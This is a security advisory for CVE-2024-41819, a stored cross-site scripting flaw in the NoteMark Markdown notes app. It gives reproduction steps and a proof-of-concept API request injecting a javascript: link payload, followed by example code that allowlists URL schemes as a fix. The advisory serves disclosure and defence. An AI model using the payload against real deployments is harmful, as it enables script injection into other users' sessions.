CVE-2024-41819

NoteMark - Stored XSS

NoteMark is a web-based Markdown notes app.

A stored cross-site scripting (XSS) vulnerability in Note Mark allows attackers to execute arbitrary scripts via a crafted payload injected into the URL value of a link in the markdown content.

This vulnerability affects version 0.13.0 and below and was fixed in 0.13.1.


Steps to Reproduce

  1. Log in to the application.

  2. Create a new note or enter a previously created note.

  3. Access the note editor functionality from the selected note by clicking on the "Editor" tab.

  4. Input the following payload: [xss-link](javascript:alert(1))

  5. Save the changes.

  6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert.


Proof of Concept

PUT /api/notes/<note-uuid>/content HTTP/1.1
Host: localhost:8000
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 34
Sec-Fetch-Site: same-origin
Authorization: Bearer <TOKEN>

[xss-link](javascript:alert(1))
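The fix for this class of bug is to allowlist the scheme of every Markdown link destination before it becomes an href. The following is an added example written for this advisory, not Note Mark's own code; BASE_URL is a constructed placeholder for the application's origin, and the tiny renderer stands in for whatever Markdown library the app uses.

```javascript
// Added example, not Note Mark's own code: allowlist the URL scheme of
// every Markdown link destination before it becomes an href. This is the
// class of check that blocks the javascript: payload in this advisory.
// BASE_URL is a constructed placeholder; a real app uses its own origin.
const BASE_URL = "https://notes.example/";
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Parse with the WHATWG URL parser, which strips tabs/newlines and
// leading/trailing control characters and lower-cases the scheme, so
// "JaVaScRiPt:" and "java\tscript:" are caught exactly as a browser
// would execute them. Relative links resolve against BASE_URL and so
// inherit its https: scheme. Anything that fails to parse is rejected.
function isSafeHref(href) {
  let url;
  try {
    url = new URL(href, BASE_URL);
  } catch {
    return false;
  }
  return SAFE_SCHEMES.has(url.protocol);
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Minimal [text](destination) renderer to show the check in context;
// allows one level of balanced parentheses in the destination, as in
// alert(1). A real app hooks the same check into its Markdown library's
// link renderer, after the library has decoded entities in the destination.
const LINK_RE = /\[([^\]]*)\]\(((?:[^()\s]|\([^()\s]*\))*)\)/g;

function renderLinks(markdown) {
  return markdown.replace(LINK_RE, (_, text, dest) =>
    isSafeHref(dest)
      ? `<a href="${escapeHtml(dest)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`
      : escapeHtml(text) // unsafe destination: keep the link text, drop the href
  );
}

// The payload from this advisory renders as inert text; a normal link is kept.
console.log(renderLinks("[xss-link](javascript:alert(1))"));
console.log(renderLinks("[docs](https://example.com/a)"));
```

Run the check on the decoded destination the Markdown parser produces, not on the raw note text, so entity-encoded variants of the scheme are normalised before the allowlist sees them.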
